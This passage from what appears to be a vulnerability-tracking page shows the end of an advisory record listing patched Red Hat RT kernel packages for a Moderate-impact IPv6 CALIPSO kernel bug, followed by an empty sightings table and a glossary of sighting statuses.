"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.